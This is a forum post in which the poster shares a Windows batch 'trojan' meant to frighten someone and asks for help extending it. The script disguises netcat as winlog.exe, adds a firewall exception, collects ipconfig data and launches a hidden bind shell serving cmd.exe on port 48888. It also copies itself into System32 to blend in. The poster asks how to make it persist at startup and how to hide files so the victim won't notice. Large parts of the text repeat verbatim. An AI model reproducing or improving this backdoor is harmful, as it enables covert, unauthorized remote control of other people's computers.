A bit o' mischief ;)
Posted: Sat Nov 12, 2011 2:38 pm
Well, I was browsing through Liidian's post (http://www.hacker.org/forum/viewtopic.php?t=2379) and I thought it would be fun to freak someone out with it... a retard that thinks he knows about computers when he can't program his way out of a paper bag. So I came up with a bit of a "trojan", which isn't actually mine, but I modified it a bit... the code is from netcat's tutorials
As you sure have guessed, winlog.exe is nc.exe renamed
Legal stuff: This is for education / curiosity reasons ONLY. If you use it for illegal activities you are on your own and none else but you is responsible.
My mods are to actually get nc to run in the backround, and even bypass Windows firewall if run from an admin shell.
I also extract the PC data to connect to it at my leisure (the concept is simple: plug the usb memory stick, execute the file, unplug, leave) and copy it to system32 because regular users rarely ever touch this thing, and the renamed file looks totally legitimate there, along winlogon.exe which BTW is a Windows essential procedure and can't be terminated . Also, system32 is by default in the path command, along with the windows directory, do I can execute it from everywhere in the pc. You get where I am going?
What this misses is the simple fact that I have to make it run every time the user starts the pc. I know that the obvious choice is the startup folder, but it is located at the user's personal folder, hence the problem: Is there any scripting adept out there who can enlighten me with the proper %what-should-I-put-here% thing, so I can just do:
copy StartEveryTime.bat %whatever%\startup ?
Also, I need another command to change the folder settings to NOT show hidden files. That way he/she won't ever take notice .
For now I have to do both of the aforementioned actions manually. So today I ask the help from any mischievous script guru and enthusiast.
Code: Select all
echo off
cls
netsh firewall add allowedprogram winlog.exe winlog ENABLE
ipconfig /all > data.txt
start winlog.exe -d -l -p 48888 -e cmd.exe
copy winlog.exe C:\WINDOWS\System32
exit
Legal stuff: This is for education / curiosity reasons ONLY. If you use it for illegal activities you are on your own and none else but you is responsible.
My mods are to actually get nc to run in the backround, and even bypass Windows firewall if run from an admin shell.
I also extract the PC data to connect to it at my leisure (the concept is simple: plug the usb memory stick, execute the file, unplug, leave) and copy it to system32 because regular users rarely ever touch this thing, and the renamed file looks totally legitimate there, along winlogon.exe which BTW is a Windows essential procedure and can't be terminated . Also, system32 is by default in the path command, along with the windows directory, do I can execute it from everywhere in the pc. You get where I am going?
What this misses is the simple fact that I have to make it run every time the user starts the pc. I know that the obvious choice is the startup folder, but it is located at the user's personal folder, hence the problem: Is there any scripting adept out there who can enlighten me with the proper %what-should-I-put-here% thing, so I can just do:
copy StartEveryTime.bat %whatever%\startup ?
Also, I need another command to change the folder settings to NOT show hidden files. That way he/she won't ever take notice .
For now I have to do both of the aforementioned actions manually. So today I ask the help from any mischievous script guru and enthusiast.